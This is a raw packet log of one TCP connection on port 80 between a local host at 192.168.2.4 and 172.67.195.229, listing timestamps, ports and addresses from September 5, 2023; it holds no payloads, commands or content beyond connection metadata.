Sep 5, 2023 13:03:11.263334036 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263365984 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.263365984 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.263380051 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263416052 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263451099 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263474941 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.263474941 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.263514996 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.263525963 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263571024 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263566971 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.263621092 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263665915 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.263669014 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263665915 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.263703108 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.263715029 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263703108 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.263794899 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.263796091 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.263840914 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263875008 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263921022 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.263966084 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264003038 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264003038 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264013052 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264051914 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264051914 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264059067 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264105082 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264108896 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264153957 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264178991 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264178991 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264202118 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264247894 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264281034 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264281034 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264281034 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264288902 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264322996 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264368057 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264388084 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264388084 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264421940 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264450073 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264450073 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264463902 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264509916 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264534950 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264534950 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264549971 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264596939 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264600992 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264626026 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264645100 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264676094 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264688015 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264735937 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264785051 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264786959 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264833927 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264844894 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264844894 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264873981 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264923096 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.264950037 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264950037 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.264967918 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265012026 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265017033 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.265017033 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.265055895 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265063047 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.265090942 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.265100956 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265149117 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265192032 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265214920 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.265214920 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.265233994 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265254974 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.265254974 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.265280008 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265321016 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.265324116 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265379906 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.265434980 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.265656948 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265788078 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.265815973 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265851974 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265872955 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265906096 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265934944 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265959978 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.265990019 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266037941 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266037941 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266062021 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266093969 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266138077 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266136885 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266182899 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266217947 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266231060 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266267061 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266267061 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266273975 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266304016 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266319990 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266361952 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266365051 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266396999 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266413927 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266448975 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266457081 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266499043 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266501904 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266544104 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266549110 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266602039 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266606092 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266653061 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266661882 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266697884 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266704082 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266741991 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266786098 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266802073 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266802073 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266829014 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266874075 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266894102 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266894102 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266895056 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266920090 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.266940117 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.266958952 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.267004967 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.267041922 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.267052889 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.267079115 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.267079115 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.267092943 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.267141104 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.267170906 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.267170906 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.267184973 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.267214060 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.267229080 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.267277956 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.267278910 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.267311096 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.267324924 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.267371893 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.267373085 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.267400026 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.267482996 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.302160978 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.302197933 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.302221060 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.302251101 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.302273989 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.302297115 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.302325964 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.302355051 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.302360058 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.302360058 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.302458048 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.302458048 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.302458048 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.388876915 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.388997078 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.389077902 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.389144897 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.389170885 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.389172077 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.389206886 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.389257908 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.389257908 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.389276981 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.389292002 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.389333963 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.389398098 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.389435053 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.389435053 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.389481068 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.389528036 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.389539957 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.389596939 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.389602900 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.389630079 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.389663935 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.389688015 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.389740944 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.390315056 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.390393019 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.390436888 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.390451908 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.390470028 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.390507936 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.390539885 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.390597105 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.391725063 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.391887903 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.393393993 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.393452883 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.393492937 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.393522978 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.393526077 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.393558979 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.393564939 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.393599033 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.393620014 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.393677950 CEST	49773	80	192.168.2.4	172.67.195.229
Sep 5, 2023 13:03:11.393707037 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.395430088 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.395495892 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.395544052 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.395576954 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.395611048 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.395653009 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.395693064 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.395736933 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.395781994 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.395818949 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.395868063 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.395916939 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.395962000 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.395998955 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396043062 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396080017 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396117926 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396245003 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396281958 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396323919 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396364927 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396409035 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396444082 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396538019 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396576881 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396651030 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396687031 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396747112 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396790981 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396828890 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396859884 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.396972895 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397023916 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397064924 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397099018 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397208929 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397242069 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397274971 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397360086 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397397995 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397434950 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397481918 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397525072 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397559881 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397594929 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397631884 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397758007 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397804976 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397844076 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397887945 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397926092 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.397965908 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398001909 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398034096 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398240089 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398277998 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398386955 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398426056 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398550987 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398590088 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398629904 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398664951 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398694992 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398819923 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398845911 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398865938 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398885012 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398905993 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.398983955 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399003029 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399079084 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399101973 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399122000 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399275064 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399317026 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399343014 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399363041 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399430990 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399537086 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399559021 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399630070 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399755955 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399780035 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399799109 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399818897 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399947882 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399975061 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.399998903 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400022984 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400043011 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400135040 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400161028 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400186062 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400222063 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400300026 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400327921 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400350094 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400378942 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400475979 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400551081 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400610924 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400630951 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400753975 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400778055 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400867939 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.400892019 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.401010036 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.401071072 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.401144028 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.401267052 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.401292086 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.401312113 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.401371956 CEST	80	49773	172.67.195.229	192.168.2.4
Sep 5, 2023 13:03:11.401395082 CEST	80	49773	172.67.195.229	192.168.2.4
